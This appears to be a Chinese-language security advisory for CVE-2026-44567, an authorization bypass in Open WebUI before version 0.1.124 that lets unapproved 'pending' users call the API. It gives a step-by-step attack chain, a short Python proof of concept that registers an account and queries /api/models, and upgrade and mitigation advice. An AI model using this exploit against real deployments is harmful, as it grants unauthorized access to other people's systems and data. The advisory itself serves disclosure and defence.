CVE-2026-44567 CVSS 7.3 高危

CVE-2026-44567 Open WebUI权限绕过漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44567

漏洞类型

权限绕过

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Open WebUI

漏洞概述

Open WebUI 0.1.124之前版本存在权限绕过漏洞。由于API未正确验证用户授权角色，默认注册为pending状态的新用户可绕过管理员审核机制，直接获取用户角色并访问Web应用程序功能。

技术细节

Open WebUI在配置允许新用户注册时，默认将用户角色设置为“pending”，通常需要管理员登录后台将其更改为“user”或“admin”后才能使用系统。但在受影响版本中，后端API在处理请求时存在逻辑缺陷，未严格校验当前用户的角色状态。攻击者只需注册一个新账号，无需等待管理员审批，即可直接利用API接口进行交互。系统错误地赋予了pending用户本应受限的访问权限，导致访问控制机制失效。

攻击链分析

STEP 1

1. 信息收集

攻击者发现目标运行Open WebUI，且开放了用户注册功能。

STEP 2

2. 注册账号

攻击者使用正常流程注册新账号，此时账号角色默认为'pending'。

STEP 3

3. 漏洞利用

攻击者直接调用API接口，利用服务端未校验角色的漏洞，绕过管理员审核。

STEP 4

4. 获取权限

成功以普通用户身份访问Web应用和数据，达成权限绕过。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests # Target URL target_url = "http://localhost:3000" # Step 1: Register a new user (Default role is pending) register_data = { "username": "attacker", "password": "password123", "email": "[email protected]" } session = requests.Session() response = session.post(f"{target_url}/api/auth/register", json=register_data) if response.status_code == 200: print("[+] Registration successful. User in 'pending' state.") # Step 2: Attempt to access a protected API endpoint without admin approval # In a vulnerable version, this bypasses the role check api_response = session.get(f"{target_url}/api/models") if api_response.status_code == 200: print("[+] Vulnerability exploited! Access granted to 'pending' user.") print(f"[+] Data: {api_response.text}") else: print("[-] Access denied.") else: print("[-] Registration failed.")

影响范围

Open WebUI < 0.1.124

防御指南

临时缓解措施

建议立即升级至0.1.124或更高版本。如果无法立即升级，请务必关闭新用户注册功能，或者通过反向代理等中间件对未授权的API请求进行拦截，直到完成修复。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表